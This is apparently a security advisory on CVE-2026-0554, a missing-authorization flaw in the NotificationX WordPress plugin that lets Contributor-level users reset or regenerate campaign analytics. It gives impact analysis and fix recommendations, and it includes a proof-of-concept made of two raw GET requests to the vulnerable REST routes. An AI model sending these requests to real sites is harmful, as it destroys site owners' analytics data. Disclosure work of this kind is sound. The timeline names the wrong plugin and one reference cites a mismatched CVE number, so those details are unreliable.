CVE-2026-0554 affects NotificationX and it is a missing authorization vulnerability that allows a low privilege authenticated user to perform destructive analytics operations against NotificationX campaigns they do not manage. The affected actions do not merely read data. They mutate campaign state by regenerating campaign entries and resetting analytics counters, which can erase evidence of performance, distort reporting, and disrupt marketing operations. This matters in real deployments because NotificationX is often used by marketing teams to measure conversions and social proof effectiveness. When a Contributor or Author can reset analytics for any campaign ID, the plugin loses its integrity guarantees and business decisions become based on attacker controlled telemetry.
| CVE | CVE-2026-0554 |
| Plugin Version | NotificationX <= 3.1.11 |
| All Time | 1 818 686 |
| Active installations | 50 000+ |
| Publicly Published | January 20, 2026 |
| Last Updated | January 20, 2026 |
| Researcher | Dmitrii Ignatyev |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0554 https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/notificationx/notificationx-3111-missing-authorization-to-authenticated-contributor-analytics-reset https://t.me/cleantalk_researches/402 |
| Plugin Security Certification by CleanTalk |  |
| Logo of the plugin |  |
PSC by CleantalkJoin the community of developers who prioritize security. Highlight your plugin in the WordPress catalog.
Timeline
| December 24, 2025 | Plugin testing and vulnerability detection in the Unlimited Elements for Elementor have been completed |
| December 24, 2025 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| January 20, 2026 | Registered CVE-2026-0554 |
Discovery of the Vulnerability
| December 24, 2025 | Plugin testing and vulnerability detection in the Unlimited Elements for Elementor have been completed |
| December 24, 2025 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| January 20, 2026 | Registered CVE-2026-0554 |
Discovery of the Vulnerability
The vulnerable surface is exposed through REST routes that accept an nx_id in the URL and perform state changing actions when called by any user who has the generic WordPress capability edit_posts. This capability is far too broad for managing a dedicated plugin subsystem, and it is not tied to the NotificationX campaign object being modified. The authorization logic does not enforce a NotificationX specific capability and it does not enforce an object level rule such as requiring ownership or requiring the ability to edit the underlying NotificationX post type. As a result, the endpoint becomes a direct IDOR style primitive because the attacker only needs to guess or enumerate campaign IDs and call the route. The design is further weakened because the operations are exposed as GET requests, which makes accidental triggers and cross origin triggers more likely, and violates the principle that state changing actions must use non idempotent methods.
Understanding of Missing Auth attack’s
In WordPress, proper authorization for plugin resources should be scoped to the plugin’s own objects and capabilities. Using edit_posts as a gate is a common developer mistake because it seems like a reasonable baseline, yet it includes many roles that should never manage plugin settings or analytics, including Authors on multi author sites. Analytics data is often treated as secondary, but it can have real consequences. Marketing teams use campaign stats to allocate budgets, validate experiments, and prove performance to clients. If a low privilege user can wipe or regenerate that data, they can sabotage campaigns, hide poor performance, or create confusion during incident response. The misuse of GET is also important. Many systems auto follow links for previews, caching, or indexing. A GET endpoint that resets state can be triggered unintentionally through normal browsing or link sharing, which means the vulnerability can cause damage even without a deliberate malicious actor. This is why authorization and method safety must be enforced together.
Exploiting the Missing Auth Vulnerability
To exploit CVE-2026-0554, an attacker with Contributor+ cookies:
POC:
GET /wordpress/index.php?rest_route=/notificationx/v1/regenerate/1 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0 Accept: application/json, */*;q=0.1 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: http://127.0.0.1/wordpress/wp-admin/post-new.php X-WP-Nonce: 00d1dde8c0 DNT: 1 Sec-GPC: 1 Connection: keep-alive Cookie: Contributor+ Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Priority: u=4 GET /wordpress/index.php?rest_route=/notificationx/v1/reset/1 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0 Accept: application/json, */*;q=0.1 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: http://127.0.0.1/wordpress/wp-admin/post-new.php X-WP-Nonce: 00d1dde8c0 DNT: 1 Sec-GPC: 1 Connection: keep-alive Cookie: Contributor+ Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Priority: u=4____
The direct impact is integrity loss in campaign analytics. A malicious Contributor can reset a high value campaign right before reporting, or repeatedly reset it to prevent meaningful tracking, which can cause financial disputes and operational disruption. Regeneration can also alter how entries are stored or displayed, creating inconsistencies that are difficult to debug. On sites that run many campaigns, attackers can iterate IDs and wipe analytics broadly, creating a denial of insight where the team loses historical data and cannot compare performance over time. The GET exposure increases practical risk because the reset can be triggered by embedded images, link unfurlers, or accidental clicks, meaning a single forum post or email link could cause unintended state changes when viewed by a logged in staff member. Even though the vulnerability is not direct account takeover, it can be used as a stepping stone for other attacks by obscuring detection signals and hiding abnormal activity behind a fog of missing telemetry. In marketing operations, that translates into silent sabotage that looks like normal data variance.
Recommendations for Improved Security
The fix requires both proper authorization and proper HTTP method use. The endpoints should enforce a NotificationX specific capability that is not granted to general editorial roles, and should also enforce object level checks so the caller can only modify campaigns they own or are permitted to manage. If NotificationX campaigns are stored as a custom post type, the server should require current_user_can edit_post for the specific campaign ID before allowing reset or regenerate. The routes should be changed to use POST or another non idempotent method, and they should validate a nonce tied to the action to prevent CSRF and accidental triggers. Rate limiting and audit logging should be added so that repeated resets are visible, with logs capturing actor user ID, target campaign ID, and the action performed. Site owners should reduce exposure by limiting which roles have edit_posts when possible, and by reviewing NotificationX role settings so that marketing controls are not reachable to low privilege accounts. If exploitation is suspected, restore analytics from backups where available and review campaign configuration changes around the time of resets.
By taking proactive measures to address Missing Auth like CVE-2026-0554 WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
#WordPressSecurity #MissingAuth #WebsiteSafety #StayProtected #HighVulnerability
Use CleanTalk solutions to improve the security of your website